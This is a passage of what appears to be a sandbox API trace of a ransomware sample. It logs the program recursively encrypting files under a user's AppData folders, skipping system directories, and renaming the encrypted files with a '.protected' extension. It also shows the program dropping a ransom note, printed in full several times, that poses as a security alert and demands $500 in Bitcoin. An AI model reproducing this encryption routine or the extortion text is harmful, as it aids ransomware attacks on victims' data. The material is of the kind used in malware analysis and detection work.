[0085.935] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.935] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.935] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.935] CloseHandle (hObject=0x14c) returned 1 [0085.936] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.protected") returned 96 [0085.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat.protected")) returned 1 [0085.936] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.936] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.936] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\RESTORE_FILES.txt") returned 88 [0085.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.937] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.937] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.937] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.937] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.938] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.938] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.938] CloseHandle (hObject=0xd8) returned 1 [0085.938] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="Windows") returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="Program Files") returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="Program Files (x86)") returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="$Recycle.bin") returned 1 [0085.938] lstrcmpiW (lpString1="Windows Media", lpString2="System Volume Information") returned 1 [0085.938] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media") returned 71 [0085.938] lstrcmpW (lpString1="Windows Media", lpString2=".") returned 1 [0085.938] lstrcmpW (lpString1="Windows Media", lpString2="..") returned 1 [0085.938] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\*") returned 73 [0085.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.938] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.938] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.938] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.938] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.938] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.938] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\.") returned 73 [0085.939] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.939] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.939] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.939] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\..") returned 74 [0085.939] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.939] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.939] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="Windows") returned -1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="Program Files") returned -1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="Program Files (x86)") returned -1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="$Recycle.bin") returned 1 [0085.939] lstrcmpiW (lpString1="12.0", lpString2="System Volume Information") returned -1 [0085.939] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned 76 [0085.939] lstrcmpW (lpString1="12.0", lpString2=".") returned 1 [0085.939] lstrcmpW (lpString1="12.0", lpString2="..") returned 1 [0085.939] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*") returned 78 [0085.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.939] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.939] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.939] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.939] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.939] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.939] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\.") returned 78 [0085.939] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.939] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.939] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.940] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\..") returned 79 [0085.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.940] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Windows") returned 1 [0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Program Files") returned 1 [0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Program Files (x86)") returned 1 [0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="$Recycle.bin") returned 1 [0085.940] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="System Volume Information") returned 1 [0085.940] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 88 [0085.940] StrStrIW (lpFirst="WMSDKNS.DTD", lpSrch=".protected") returned 0x0 [0085.940] lstrcmpW (lpString1="WMSDKNS.DTD", lpString2="RESTORE_FILES.txt") returned 1 [0085.940] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.940] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.940] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 88 [0085.940] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".txt") returned 0x0 [0085.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 88 [0085.941] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".rar") returned 0x0 [0085.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 88 [0085.941] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".zip") returned 0x0 [0085.941] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1f2, lpOverlapped=0x0) returned 1 [0085.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.941] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f2, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x1f2, lpOverlapped=0x0) returned 1 [0085.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.942] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.942] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.942] CloseHandle (hObject=0x150) returned 1 [0085.942] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.protected") returned 98 [0085.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.protected")) returned 1 [0085.943] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Windows") returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Program Files") returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Program Files (x86)") returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="$Recycle.bin") returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="System Volume Information") returned 1 [0085.943] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 88 [0085.943] StrStrIW (lpFirst="WMSDKNS.XML", lpSrch=".protected") returned 0x0 [0085.943] lstrcmpW (lpString1="WMSDKNS.XML", lpString2="RESTORE_FILES.txt") returned 1 [0085.943] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.943] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 88 [0085.944] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".txt") returned 0x0 [0085.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 88 [0085.944] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".rar") returned 0x0 [0085.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 88 [0085.944] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".zip") returned 0x0 [0085.944] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x27cf, lpOverlapped=0x0) returned 1 [0085.954] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd831, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.954] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x27cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x27cf, lpOverlapped=0x0) returned 1 [0085.955] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.955] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.955] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.955] CloseHandle (hObject=0x150) returned 1 [0085.955] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.protected") returned 98 [0085.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.protected")) returned 1 [0085.956] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.956] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.956] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\RESTORE_FILES.txt") returned 94 [0085.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.958] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.958] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.959] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.959] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.959] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.959] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.959] CloseHandle (hObject=0x14c) returned 1 [0085.960] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.960] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.960] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\RESTORE_FILES.txt") returned 89 [0085.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.961] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be 